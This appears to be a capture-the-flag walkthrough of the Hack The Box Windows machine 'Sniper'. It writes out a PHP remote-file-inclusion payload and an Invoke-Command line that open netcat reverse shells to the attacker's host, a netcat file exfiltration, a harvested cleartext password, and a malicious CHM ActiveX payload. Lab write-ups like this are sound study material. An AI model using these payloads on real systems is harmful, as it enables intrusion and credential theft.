Sniper

Sniper is a medium difficulty windows box that has web based exploits

Recon

We start off scanning Snipers IP 10.10.10.151 with nmap

nmap -T4 -A -v 10.10.10.151

From Our Results we get the following services and ports

PORT    STATE SERVICE       VERSION
80/tcp  open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Supported Methods: GET POST
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Sniper Co.
135/tcp open  msrpc         Microsoft Windows RPC
139/tcp open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds?

Here we find port 80 is open, which means it must be hosting a website, upon navigating to 10.10.10.151:80 we find exactly that

for the most part we find nothing exceptionally interesting except.. a particular url http://10.10.10.151/blog/?lang=blog-en.php the ?lang= indicates that it may be vulnerable to RFI attacks but we have no way of getting a shell? Let's take a look at our nmap scan again, it seems SMB is also open, we can usue this to access a SMB Share of ours.

apt-get install samba
mkdir -r /tmp/sniper/smb
chmod 777 /tmp/sniper/smb

For the sake of anonymous access we'll have to make some changes to our SMB Config, we can find it at /etc/samba/smb.conf at the end of the file we'll have to add

[public]
comment = Samba on Ubuntu
path = /tmp/smb
read only = no
browsable = yes
guest ok = Yes

Also due note that the smb folder has the correct permissions

For these changes to take effect we'll have to restart the smb service we can do this with service smbd restart

Windows doesn't natively come with netcat due to this we'll have to download it and host it ourselves we can get it from here https://eternallybored.org/misc/netcat/ and place it in our smb share folder

once we have this, we should start a local netcat listener this can be done with

nc -lnvp 8888
ifconfig tun0 #get VPN IP

perfect we are ready to connect back to our machine from the target, now to trigger our RFI vulnerability

<?php $answer = system('\\\\10.10.15.32\\pizza\\nc.exe 10.10.15.32 8888 -e powershell.exe');echo $answer."</br>"; ?>
http://10.10.10.151/blog/?lang=\\10.10.15.32\pizza\pizza.php

once our session is up and running we can go around looking for ways to escalate privileges to a user shell. Looking into C:/Users/ we find a user called Chris

    Directory: C:\users                                                                                                                                               
                                                                                                                                                                      
                                                                                                                                                                      
Mode                LastWriteTime         Length Name                                                                                                                 
----                -------------         ------ ----                                                                                                                 
d-----         4/9/2019   6:47 AM                Administrator                                                                                                        
d-----        4/11/2019   7:04 AM                Chris                                                                                                                
d-r---         4/9/2019   6:47 AM                Public

since we have a site up we should check its host directory which in this case is C:/inetpub/wwwroot under this we find a directory called user and under it db.php in this we find a db connection with a password in clear text that being 36mEAhz/B8xQ~2VM we can safely assume that this is the user credentials.

<?php
// Enter your Host, username, password, database below.
// I left password empty because i do not set password on localhost.
$con = mysqli_connect("localhost","dbuser","36mEAhz/B8xQ~2VM","sniper");
// Check connection
if (mysqli_connect_errno())
  {
  echo "Failed to connect to MySQL: " . mysqli_connect_error();
  }
?>

Now we have user Creds, its time to login as user

Exploit

We can locally escalate user via the credentials we have and execute our payload to do this on powershell we'll

nc -lnvp 6464 #local listener

Huge thanks to @3r3bu5 for this tip

$user = "sniper\Chris" save a variable for chris as user
$password = ConvertTo-SecureString "36mEAhz/B8xQ~2VM" -AsPlainText -Force #convert the password to a plain-text string into password variable
$credential = New-Object System.Management.Automation.PSCredential ($user, $password) #create a PS credentials object of chris and the db password
Invoke-Command -ComputerName localhost -ScriptBlock { \\\\10.10.14.170\\pizza\\nc.exe 10.10.14.32 6464 -e powershell.exe } -Credential $credential #run nc from our smb share in context of Chris

Now that we have Chris we can get our first flag

cd ../Desktop
cat user.txt

Post Exploitation

Now that we have user we can dig around for root.

exploring C:/ reveals a directory called Docs opening it gives us 2 files

    Directory: C:\Docs


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
-a----        4/11/2019   9:31 AM            285 note.txt                                                              
-a----        4/11/2019   9:17 AM         552607 php for dummies-trial.pdf

getting the output of note.txt shows us

Hi Chris,
        Your php skillz suck. Contact yamitenshi so that he teaches you how to use it and after that fix the website as there are a lot of bugs on it. And I hope that you've prepared the documentation for our new app. Drop it here when you're done with it.

Regards,
Sniper CEO.

Yikes! looks like the CEO isn't to happy with us.

Let's continue Digging around. Checking the Downloads directory for Chris shows us a instructions.chm looks interesting lets swipe it and have a look

we can use certutil to encode the file in base64 and make it much easier to transfer for that we'll use

certutil -encode "instructions.chm" instructions.chm.txt

and to transfer it we'll use netcat yet again

nc -lp 1234 > instructions.chm.txt #on local
cat instructions.chm.txt | \\10.10.14.32\pizza\nc.exe -w 3 10.10.14.170 1234 #on target

now we can head over to windows to decode our instructions.chm

certutil -decode instructions.chm.txt instructions.chm

Yikes definetely a lot of bad blood here.

Fortunately it gives us a hint, going back to the CEO's note he noted that he was waiting for the documentation. Given Chris created this it stands to reason that the documentation was a .chm Googling around we find that we can exploit chm!

Going back to windows we have to create CHM via html help workshop

Once we have the workshop setup we need to create a new project in it. Once we've done that we need to create a html file which will have our payload which is

<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
  <PARAM name="Command" value="ShortCut">
  <PARAM name="Button" value="Bitmap::shortcut">
  <PARAM name="Item1" value=',cmd.exe, /c typeC:\Users\Administrator\Desktop\root.txt > C:/pizza/root.txt,'>
  <PARAM name="Item2" value="273,1,1">
</OBJECT>
<SCRIPT>
  x.Click();
</SCRIPT>

And edit the .hhp to include our malicious html

[OPTIONS]

[FILES]
Untitled1.htm

and compile, once you have your chm we can transfer it over to our victim. To do this we'll use SimpleHTTPServer

python -m SimpleHTTPServer 8088 #start server in the same directory as payload
Invoke-WebRequest http://10.10.14.32:8088/pizza.chm -OutFile C:/Temp/pizza.chm #Download Payload to machine

Great but now how do we get root? Well the CEO did also say to "drop it here" so lets copy our malicious chm to C:\Docs and hope for the best

cp pizza.chm C:\Docs\

And voila after a minute we should be having our root flag in C:/Temp or a session if you wanted it to be so.

Useful Links

PreviousForest NextRegistry

Last updated 4 years ago